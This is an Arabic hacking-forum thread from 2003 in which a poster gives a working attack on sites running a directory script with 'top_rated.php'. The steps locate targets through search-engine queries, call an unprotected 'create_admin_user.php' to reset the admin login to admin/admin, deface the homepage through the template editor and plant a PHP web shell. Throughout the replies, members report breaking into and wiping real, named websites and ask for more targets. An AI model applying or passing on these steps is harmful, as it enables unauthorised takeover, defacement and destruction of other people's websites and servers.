المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثــغـــرة جــديــدة top_rated.php


TaZ HaCkEr
08-08-2003, 07:08
بسم الله الرحمن الرحيم

اذهب الى اي محرك بحث وليكن www.google.com

top_rated.php

مثـــــــــــــــال :"
http://www.XXX.com/top_rated.php

قم باستبدال top_rated.php

بــ recovery_tools/create_admin_user.php

هكذا...
http://www.XXX.com/recovery_tools/create_admin_user.php

اذا ظهرت لك صفحة مكتوب فيها التالي
Delete old administrator user ....ok
Create new administrator user ....ok

اذن نجحت الان اصبح اسم المستخدم وكلمة المرور admin

user=admin
pass=admin

اذهب الى لوحة التحكم وافعل ماشئت

للدخول للوحة التحكم :
http://www.XXX.com/admin/index.php

شرح بعض خيارات لوحة التحكم المهمه

اذهب الى Change Password لتغيير كلمة المرور

و Edit File Email Address لتغيير البريد

و View/Edit/Delete لحذف او عرض او تعديل

ولتغيير الصفحة الرئيسية

اختر Template Modifier واختار default

ومن File name اختر index html

وادخل على Edit File

واكتب بالفرونت اللي يعجبك والصق كود html هنا اخيراً Save Change

وتقدر تستفيد من الثغره اكثر بتعديل ملف msg.php اذا كان موجود

وتضع فيه كود phpshell واستمتع ..وطبق الاوامر


انتهى ..

وفق الله الجميع
:)

Smart c0d3r
08-08-2003, 07:13
اهلين حبيبي تاز

تسلم من جد على هذه الثغرة الحلوة

وراح اطبقها حاااااااالاً بس ان شاء الله محد يستخدمها على المسلمين

فيه مواقع عربية فيها هالثغرة

وجب التنويه

فمان الله|4||4|

Mr_x_x
08-08-2003, 07:16
الله يعطيك الف الف الف الف عافيه اخوي تاز وربي انك بطل وشو بطل؟ لكمه قليله لازم نقول اممممممممممممم داهيه بالهكر طبعا يعني صراحه رهييييييييييييب مره والى الاما وانا رح اجربها الحين اوكي حبي والله يعطيك العافيه وارجع اقولك انت بـطـــــل
اخوك
Mr_x_x

TaZ HaCkEr
08-08-2003, 07:31
السلام عليكم

Mr_x_x & المتمكن


الله يعطيكم العافيه ووخلونا نشووف اختراقاتكم :)

الــولــيــد نت
08-08-2003, 08:24
وااااااااااااااااااااااااااااااااااااااااو



الاستاذ تازا هكر


دائما مبدع ومشاءالله عليك وتسلم على هالثغره الحلوووه


وقدرة اخترق فيها تسلم اخوي تازا على هذا الشرح الرائع



ابي توقيع لك ياتازا ==============> واحد من المعجبين فيك

تسلم اخوي

أبو خالد
08-08-2003, 08:24
اول باول ما شاء الله عليك

TaZ HaCkEr
08-08-2003, 10:58
الوليــــد نت & أبو خــالد

مشكورين على ردودكم والله يوفقكم :)

شوق
08-08-2003, 11:56
no no :(

no no :confused:


by

shark_lips
08-08-2003, 12:12
مشكووووووووووووور اخوي تاز على الثغرة بس للأسف اليوم شيكت على المواقع العربية
تقريبا 70% الثغرة موجودة:mad::mad::mad::mad:
و الثغرة بعدها طازة يعني بتأكل خبز:D:D:D
الله يعطيك العافية و ان شاء كل جديد بيكون عندك

Mohammed_777
08-08-2003, 01:05
شكرا على الثفره لكن لما وصلت الى كتابه كلمه :
user : admin
pass : admin
ماضبط !!! وشكرا على الثغره ..

Mohammed_777
08-08-2003, 01:17
شكرا لك اخى العزيز الثغره عملت معي اشكرك من كل قلبي

خالد7
08-08-2003, 07:49
ايوا ايوا تاز تصفيق من عندي والف شكر على الثغره ودائما تتحفنا بمواضيعك المميزه :p

يالله انا بادي من الحين .
مااشوف اختراقات ليش ..طيب اجرب واقول اذا في شي يبغى توضيح ,ويمكن ماعرف اتوضح لنا ياتاز زين
وسلااامتك

خالد7
08-08-2003, 08:47
الصفحه الرئيسيه موراضي ينحذف منه اي شي امر ال delet وجود بس يقول لاااا

بس اخترقت http://www.onlyscripts.com/cp
اذا في توضيح ياتاز
يالله

خالد7
08-08-2003, 09:26
للمعلومه فقط

Present Password
New Password
Confirm New Password
كلمة السّرّ الحاضرة
كلمة السّرّ الجديدة
أكّد كلمة السّرّ الجديدة

admin1
admin1
http://www.onlyscripts.com

خالد7
08-08-2003, 09:44
طيب الموقع هذا امصكر الثغره

http://www.alsa7l.net/daleel/recovery_tools/restore_db.php

السارق
08-08-2003, 10:34
مشكور يا اخي العزيز


لكن تقدر تقول لي كيف احصل على ثغرات جديده واكون شاكر الك

TaZ HaCkEr
09-08-2003, 12:49
السارق & خالد7 & Mohammed_777 & شوق & shark_lips

مشكورين ياحبايبي على الردود

واللي جربوا في موقع ولا ضبطت يجرب في موقع ثاني وثالث ..الخ

لان نسبة المواقع المصابه تصل 80 % تقريباً واكثر

افحص كل المواقع في محركات البحث وانا متأكد انك بتحصل خير


شكرا على التوضيح ياخالد 7 واذا فيه موقع مسكرها انت قلت موقع مو كلها;)

shark_lips انا مريت على المواقع العربيه ونبهتهم :) ولكن تفاجأت للاسف انه

في عضو في المنتدى متحمس ويطبق على المواقع العربيه لن اذكر اسمه

لكن حرام عليه :o


شوق ليه No ?:confused: اذا ماكتبنا الثغرات الجديده ننتظر مين !

السارق الثغرات الجديده تحصلها في مواقع السكيورتي

مثل www.securityfocus.com

www.packetstormsecurity.nl

www.securiteam.com/

تحياتي للكل:)

خالد7
09-08-2003, 02:21
انا يومني قلت على ان الموقع امصكر الثغره
http://www.alsa7l.net/daleel/recovery_tools/restore_db.php
النيه صافيه و كنت ابي اقول صاحب الموقع بصراحه ..بس تفاجائت بعد كلامي ان الموقع
http://www.alsa7l.net

Al7ooOooT
09-08-2003, 03:46
مشكور أخوي TaZ HaCkEr


ما قصرت الله يعطيك العافية :)

TaZ HaCkEr
09-08-2003, 04:37
وش نسوي ياخالد 7 ناس ماتفهم :)

Al7ooOooT

الله يوفقكم :)

خالد7
09-08-2003, 04:57
http://www.turkscripts.com

ساعتين وانا امسح فيه حتى البور مسحته وانا ماادري :mad:

خالد7
09-08-2003, 05:15
تاز اشرحلي إذا وصلت للصفحه ...
http://www.onlyscripts.com/admin/template_modify.php
كل ما ابي ادخل الكود واضغط يقول غلط ومايصير
وضغطت مره ثانيه يقولي خلي تاز يقولك لوول

خالد7
09-08-2003, 11:09
مابغت تنحل ياتاز من امس سهران الله يرجك :Dواللي حلها واحد معنا بالمنتدى sowrdman
بارك الله فيكم كللمك

هذا اول واحدhttp://www.myadelaide.com

الطريقة دخول من admin

المهم
اذا دخلت راح تلاقي في وسط الصفحه
Welcome to the INDEXU Administrator Control Panel

Active


--------------------------------------------------------------------------------

Categories

Links 325

Reviews
0

Mailing List Subscribers 0


Pending


--------------------------------------------------------------------------------

Links 2

Reviews 0

Broken Link Report 0

ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــ

تمام :اظغط على Categories

هتفتحلك صفحه ثانيه ...تحت هذي الكلمه View Categories

في سطوور وبجنبه كلمة [edit] اضغط عليه راح تلاقي اربع مربعات لنسخ الاكواد

اكتب اللي تكتبه بعده اضغط على edit Categories

وعلى كذا احنا خالصين وشكر لتاز وشكر لsowrd
وسلامتكم
والنوم ساس اللوم لوول

saso
09-08-2003, 04:59
الف شكر الك يا تاز على هالثغره الجميله ومشكور والله يعطيك الف عافيه
انا طبقت الشرح ونجحت في اختراق عدد من المواقع وكل شي تمام
بس بعد عددت ساعات فتحت على الصفحات يلي اخترقتهم
وجددت شخص جديد مخترق المواقع فادا ممكن تشرح لنا
كيف ممكن نغلق الثغره مره اخرى للضروره القصوى
وكمان مره الف شكر لعيونك

TaZ HaCkEr
10-08-2003, 09:42
خالد 7 ماشاء الله عليك مجتهد مشكور على الاضافه

وفيه بعد تدخل على setup واحذف الـ Topكامل ;)



saso اظن فيه كود يقووم بهالعمل لكن مو موجود عندي

اقولك حاول ترفع phpshell علشان تخترق السيرفر كامل

فمان الله

saso
11-08-2003, 04:10
شكرا يا استاد TaZ HaCkEr
على التوضيح والله ما يرحمنا من مواضيعك الجذابه
عندي استفسار تاني
انا مبتدا في هكر المواقع وما اعرف ما هوphpshell
بس بطلب منك طلب ولو تسمح يا اخ TaZ HaCkEr
ان تشرحلي موضوع phpshell وبكون مشكور اكتير الك
يا احلى مشرف
يامعلم

TaZ HaCkEr
12-08-2003, 03:43
مشكوور ياsaso

وياليت تتفضل على منتدى امن المواقع والشبكات

واسئل واطلب اللي تبي وانا متستعد اجاوبك :)

saso
13-08-2003, 07:33
مرحبا اخي TaZ HaCkEr شكرا الك كتير على الرد
وحبك لمساعده الاخرين والله انك تستحق كل تقدير واحترام
اما بالنسبه للموضوع فوجدت في احدى المنتديات شرح وافي وكافي عن
phpshell واستكفي في هادا الشرح
وشكرا الك يا اخي TaZ HaCkEr واعرف انك ما بتقصر مع احد
اخوك saso

TaZ HaCkEr
14-08-2003, 03:53
welcome any time saso :)

غشيم
14-08-2003, 04:10
يااخوي احصل مواقع كثيره واخش لوحة التحكم
وكل ما اجي امسح مافيه فايده
واروح واركب الكود الهتميل قلت نشوف ويضا مايفه فاايده
ارجوو التوضيح والله المواقع كثيره خشيت على لوحة التحكم

TaZ HaCkEr
14-08-2003, 05:09
بعض المواقع ماتقدر تعدل فيها..

لكن ادخل على لوحة التحكم وسو Setup واحذف كل شي وارجع جرب مره ثانيه

:)

الهجوم
14-08-2003, 11:15
و انا كمان اخى كل شى بترجع و لكن فى بعض الموقع يكون ما لك صلاحيات فى اشى كثر


الهجوم

TaZ HaCkEr
15-08-2003, 08:32
مثل ماقلت مالك الا تسوي Setup :)

saso
17-08-2003, 05:58
اخي الكبير TaZ HaCkEr هل توجد طريقه اخرى للبحث عن هده الثغره
في محركات البحث غير كلمه
top_rated.php
ومشكور يا اخي العزير

TaZ HaCkEr
18-08-2003, 02:11
هذي افضل كلمة على مااعتقد علشان تحصل على النتايج

او جرب في جوجل allinurl: top_rated.php

MR.DJAY
19-08-2003, 05:13
كيف الشباب أخي العزيز تاز بس حابب أسأل أنه بعد تغيير صفحة الإندكس لا تظهر عند فتح الموقع يعني لنفرض عدلت في الموقع
www.XxX.com
لازم أول ما تفتح الموقع تتطلع الاندكس المعدلة يعني لازم نفتح
www.XxX.com/index.html
فتظهر الاندكس المعدلة
أو ماذا
:confused:

TaZ HaCkEr
19-08-2003, 07:21
انت لما تغير الاندكس تغير الاندكس تبع الـ Top rated بس

:)

MR.DJAY
19-08-2003, 07:25
تمام تمام شكرا" :)

MR.DJAY
20-08-2003, 11:48
صرت شايف كم موقع تتطبق عليهم الثغرة لكن عند الدخول للوحة التحكم لا يقبل:confused:

U:admin
P:admin

------
http://www.backnetz24.de/
-------
وبالنسبة لبعد الاختراق ما هو امتداد الصفحة المخترق الإندكس لل top rated
وين إيش الباث المسار

MR.DJAY
20-08-2003, 12:37
أحلى شباب
http://www.3asfh.com/vb/showthread.php?s=&threadid=3683
:)

saso
20-08-2003, 09:19
مشكور يا احلى مشرف على الثغره
وما تنسانا بالثغرات الجديده

TaZ HaCkEr
21-08-2003, 01:08
مبروووك ;)MR.DJAY

saso ان شاء الله كل جديد :)

MR.DJAY
21-08-2003, 01:51
هلا فيك هلا بالحبيب TaZ HaCkEr إن شاء الله نلتقي على الماسنجر قريبا" :)

TaZ HaCkEr
23-08-2003, 07:03
ان شاء الله

ارسل لي رساله خاصه ايميلك

:)

MR.DJAY
23-08-2003, 04:02
تم إرسالها :cool:

momeeen
24-08-2003, 01:58
شكرا على هذة الثغرة الرائعة ولكني
وجدت ان معظم المواقع المانية
وكثير منها قد قام بتغطية هذة الثغرة
انا أريد ثغرات للمواقع الاسرائيلية
وشكرااااااااااااااااااا

El_TeNNiiN
01-09-2003, 12:26
http://web.kempo.ru/
شكرن أخ تاز عالموضوع
محدش ييأس
الثغره جربتها في 8 مواقع قبل ده علي ما جت:D
اخوكم التنين

TaZ HaCkEr
01-09-2003, 12:51
El_TeNNiiN & momeeen

موفقين ولابد المحاولة مره مرتين ثلاث:)

العاصف99
08-09-2003, 01:05
السلام عليكم ااخواني انا جربت الثغرة وجات الرسالة
Delete old administrator user ....ok
Create new administrator user ....ok

ولمن احاول ادخل بي
اليوزرنيم والباسورد مايدخل

اارجوا الافادة ااخوانيadmin

نونا
08-09-2003, 11:42
شوف اخوي تاز انا ساويت زي ماقلت وشوف

http://www.backnetz24.de/recovery_tools/create_admin_user.php

كتبت admin
للباسورد واليوزر نيم بس مواراضي

ايش اساوي؟:rolleyes:

TaZ HaCkEr
10-09-2003, 06:23
شوفي غيره يااختي

وبتنجح معاك :)